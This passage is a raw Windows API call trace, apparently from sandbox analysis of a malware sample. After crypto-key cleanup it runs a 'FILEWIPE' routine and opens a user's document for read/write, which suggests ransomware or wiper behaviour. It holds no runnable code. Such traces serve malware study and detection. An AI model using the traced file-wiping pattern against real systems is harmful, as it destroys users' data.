Size=0x8) returned 0x9c2668 [0173.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0173.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0173.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0173.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0173.054] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.054] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0173.055] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0173.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0173.055] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0173.055] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0173.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.055] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0173.055] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.055] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.055] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0173.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.055] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.055] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0173.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0173.055] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.055] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.055] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0173.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0173.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.060] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0173.060] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.060] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0173.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0173.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.065] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.065] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.066] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0173.066] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0173.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0173.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0173.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0173.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0173.066] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.066] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0173.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.066] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0173.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0173.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0173.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0173.066] CryptDestroyKey (hKey=0x90af98) returned 1 [0173.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0173.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0173.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0173.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0173.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0173.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0173.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0173.067] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0173.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0173.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0173.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0173.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0173.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0173.067] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0173.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0173.067] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0173.067] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0173.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0173.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.067] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0173.067] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0173.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.067] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0173.067] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0173.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0173.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.067] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.068] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0173.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0173.090] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0173.091] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0173.091] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0173.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0173.091] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.091] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0173.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0173.091] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0173.091] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0173.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.091] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0173.091] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0173.091] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.091] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0173.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.091] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.091] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0173.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0173.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0173.092] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0173.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0173.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0173.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.092] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.092] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0173.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0173.092] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0173.092] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0173.092] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.092] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0173.092] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.092] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.092] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0173.092] FreeLibrary (hLibModule=0x74f20000) returned 1 [0173.092] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.092] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.092] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.092] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.093] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.096] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.096] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0173.097] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.097] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.097] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a766f40, ftCreationTime.dwHighDateTime=0x1d5ddc1, ftLastAccessTime.dwLowDateTime=0x40a7d2d0, ftLastAccessTime.dwHighDateTime=0x1d5db4e, ftLastWriteTime.dwLowDateTime=0x40a7d2d0, ftLastWriteTime.dwHighDateTime=0x1d5db4e, nFileSizeHigh=0x0, nFileSizeLow=0x9ec8, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="SSq5T5u.odt", cAlternateFileName="")) returned 0x90ae18 [0173.097] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0173.097] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.098] CharLowerBuffW (in: lpsz="byte[40648]", cchLength=0xb | out: lpsz="byte[40648]") returned 0xb [0173.098] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.098] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0173.098] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.098] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0173.098] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0173.099] FreeLibrary (hLibModule=0x75c90000) returned 1 [0173.099] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.099] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.099] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.099] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0173.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.100] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.100] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.100] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0173.100] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.100] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\ssq5t5u.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0173.100] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.100] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.100] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.100] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, 